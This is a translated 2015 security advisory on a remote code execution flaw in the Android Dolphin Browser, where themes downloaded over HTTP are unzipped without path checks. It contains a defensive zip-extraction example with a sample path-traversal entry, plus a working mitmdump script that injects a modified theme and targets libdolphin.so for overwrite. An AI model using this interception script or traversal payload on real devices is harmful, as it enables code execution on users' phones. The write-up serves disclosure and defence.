Android Dolphin Browser remote code execution-vulnerability warning-the black bar safety net
2015-08-25T00:00:00
ID MYHACK58:62201566162 | Type myhack58 | Reporter 佚名 (anonymous) | Modified 2015-08-25T00:00:00
Description
An attacker who can control the network traffic of the Android Dolphin Browser can tamper with the browser's "download and apply a new theme" function. Through this function the attacker can write arbitrary files, and those files lead to code execution in the browser's environment on the user's device. The only user interaction the attack requires is selecting, downloading and applying a theme.
As of 27 July 2015, Google Play Store data show that the Dolphin Browser already has 1 million downloads.
Vulnerability analysis
The Android version of the Dolphin Browser has a feature that lets the user personalise the browser by downloading and applying a theme. When the user selects a new theme, it is downloaded over plain HTTP:
GET http://opsen-static.dolphin-browser.com/resources/themestore/Red_roof.dwp
The theme file will be saved to the following location:
root@hammerhead:/sdcard/Download # ls
Red_roof.dwp
The "dwp" extension is merely a custom extension used by the Dolphin Browser; the file is in fact a plain zip archive.
$ file Red_roof.dwp
Red_roof.dwp: Zip archive data, at least v2.0 to extract
Listing its contents shows the data that is used to apply the theme:
unzip -l Red_roof.dwp.orig
Archive:  Red_roof.dwp.orig
  Length      Date    Time    Name
---------  ---------- -----   ----
    18165  12-18-14 09:57   icon.jpg
      237  12-19-14 14:35   theme.config
   131384  12-18-14 09:54   wallpaper.jpg
---------                     -------
   149786                     3 files
We then reverse-engineered the select, download and apply-theme process and found that this feature also unzips the theme file and applies the theme's other configuration.
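The theme is a zip archive that the browser unzips into its own data directory, so the safety of the whole feature rests on how entry names inside the archive are handled before anything is written. The following is an added example, written for this page and not code from the Dolphin Browser, showing how a theme extractor should validate each entry against a whitelist of expected file names and against the destination directory, and refuse the entire archive if any entry tries to climb out of it. The whitelist (taken from the listing above), the extraction directory and the sample archives are constructed for the demonstration; the hostile entry name is an assumption illustrating the traversal pattern, not a file from the page.

```python
import io
import os
import tempfile
import zipfile
from typing import List, Tuple

# Entries a theme is allowed to contain, taken from the listing above (assumed whitelist).
ALLOWED_NAMES = {"icon.jpg", "theme.config", "wallpaper.jpg"}


def build_sample_theme(include_escape: bool) -> bytes:
    """Constructed sample archive (not a real Dolphin theme). With include_escape
    it adds an entry whose name climbs out of the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("theme.config", "name=Red_roof\n")
        zf.writestr("wallpaper.jpg", b"\xff\xd8\xff\xe0 constructed bytes")
        if include_escape:
            # Hypothetical traversal entry; the target name is only illustrative.
            zf.writestr("../../files/libdolphin.so", b"constructed bytes")
    return buf.getvalue()


def is_safe_entry(name: str, dest_dir: str) -> bool:
    """True only for a bare, whitelisted file name that resolves inside dest_dir."""
    if not name or "\x00" in name or name.startswith(("/", "\\")):
        return False
    # A theme entry must be a plain file name, not a path, and must be one we expect.
    if os.path.dirname(name) != "" or os.path.basename(name) not in ALLOWED_NAMES:
        return False
    # Belt and braces: resolve the final path and confirm it stays under dest_dir.
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, name))
    return os.path.commonpath([dest, target]) == dest


def check_theme(data: bytes, dest_dir: str) -> Tuple[List[str], List[str]]:
    """Split the archive's entries into accepted and rejected names without writing anything."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            (accepted if is_safe_entry(info.filename, dest_dir) else rejected).append(info.filename)
    return accepted, rejected


def extract_theme(data: bytes, dest_dir: str) -> List[str]:
    """Refuse the whole archive if any entry is unsafe; otherwise write the accepted files."""
    accepted, rejected = check_theme(data, dest_dir)
    if rejected:
        raise ValueError("unsafe theme entries: %s" % rejected)
    os.makedirs(dest_dir, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in accepted:
            with zf.open(name) as src, open(os.path.join(dest_dir, name), "wb") as dst:
                dst.write(src.read())
    return accepted


def demo() -> Tuple[List[str], str]:
    """Extract a clean theme into a temp directory, then show the hostile one being refused."""
    dest = tempfile.mkdtemp(prefix="theme_demo_")
    written = extract_theme(build_sample_theme(False), dest)
    try:
        extract_theme(build_sample_theme(True), dest)
        refused = ""
    except ValueError as e:
        refused = str(e)
    return written, refused


if __name__ == "__main__":
    print(demo())
```

Validating before writing (rather than extracting and cleaning up afterwards) matters because the first bad entry would already have overwritten its target by the time a post-check ran; the extractor here rejects the archive as a whole so that a partially applied theme cannot leave a mix of trusted and attacker-controlled files in the data directory.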
Exploit
For exploitation, the first step is to proxy the download traffic and inject a modified theme. This requires configuring a proxy on the test device and then writing a simple inline script for mitmdump:
# Inline script for the mitmdump of that era (libmproxy 0.x API).
from libmproxy.protocol import http
from netlib import odict


def request(context, flow):
    # Only answer theme downloads from the theme store host.
    if not flow.request.host == "opsen-static.dolphin-browser.com" \
            or not flow.request.path.endswith(".dwp"):
        return
    # Build a 200 OK response that claims to carry a zip archive.
    response = http.HTTPResponse([1, 1],
                                 200,
                                 "OK",
                                 odict.ODictCaseless([["Content-Type", "application/zip"]]),
                                 "yo!")
    # Replace the body with the locally modified theme archive.
    try:
        with open("Red_roof.dwp", "rb") as f:
            modified = f.read()
            response.content = modified
            response.headers["Content-Length"] = [len(modified)]
    except IOError as e:
        raise e
    # Return the crafted response to the client instead of forwarding the request.
    flow.reply(response)
We also need to use the browser's theme decompression process. Since there are many such cases, we do not elaborate on it here.
The first verification showed that the modified theme injected into the download response is written as an arbitrary file into the Dolphin Browser's data directory. To turn this into code execution, we next need to find a file that can be overwritten.
A quick scan found a native library in the files directory: libdolphin.so
root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser # cd files/
root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser/files # ls
AppEventsLogger.persistedevents
EN
icons_cache
libdolphin.so
name_service
splash.on
It seemed we had been handed a gift: with this library writable, full code execution is possible. So I produced a corresponding payload:
unzip -l Red_roof.dwp
Archive:  Red_roof.dwp
  Length      Date    Time    Name
---------  ---------- -----   ----